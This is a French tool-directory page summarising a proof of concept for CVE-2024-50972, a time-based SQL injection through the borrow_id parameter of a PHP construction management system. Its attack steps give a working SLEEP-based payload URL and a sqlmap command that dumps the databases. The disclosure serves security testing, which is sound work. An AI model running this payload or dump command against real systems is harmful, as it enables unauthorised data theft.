Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50972 — Preuve de concept pour l'injection SQL dans Itsourcecode Construction Management System 1.0, démontrant une injection basée sur le temps via le paramètre borrow_id et fournissant les étapes d'exploitation. | Kitploit
Outils/GitHubGitHub/akhlak2511/cve-2024-50972
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubakhlak2511/cve-2024-50972

CVE-2024-50972

Preuve de concept pour l'injection SQL dans Itsourcecode Construction Management System 1.0, démontrant une injection basée sur le temps via le paramètre borrow_id et fournissant les étapes d'exploitation.

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50972

Description

Une vulnérabilité d'injection SQL dans printtool.php de Itsourcecode Construction Management System 1.0 permet à des attaquants distants d'exécuter des commandes SQL arbitraires via le paramètre borrow_id.

Type de vulnérabilité

Injection SQL

Fournisseur du produit

Itsourcecode

Base de code du produit concerné :

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Composant concerné :

Le système de gestion de construction Itsourcecode v1.0 est vulnérable à l'injection SQL via le paramètre borrow_id dans la page printtool.php

Vecteurs d'attaque :

  1. Configurez l'application localement et connectez-vous avec les identifiants admin : admin
  • Accédez à l'URL suivante dans votre navigateur : http://localhost/monitoring_system/printtool.php?borrow_id=5
  • Injectez la charge utile SQL : Modifiez le paramètre borrow_id dans l'URL pour inclure une charge utile d'injection SQL temporelle. http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
  • Observez la réponse de l'application : La page devrait prendre significativement plus de temps (20 secondes) à charger si l'injection réussit, confirmant que le paramètre borrow_id est vulnérable à l'injection SQL.
  • Utilisez maintenant l'outil SQLMap pour une exploitation plus poussée et le dump des bases de données à l'aide de la commande ci-dessous : sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
  • Référence :

    1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Télécharger l’outil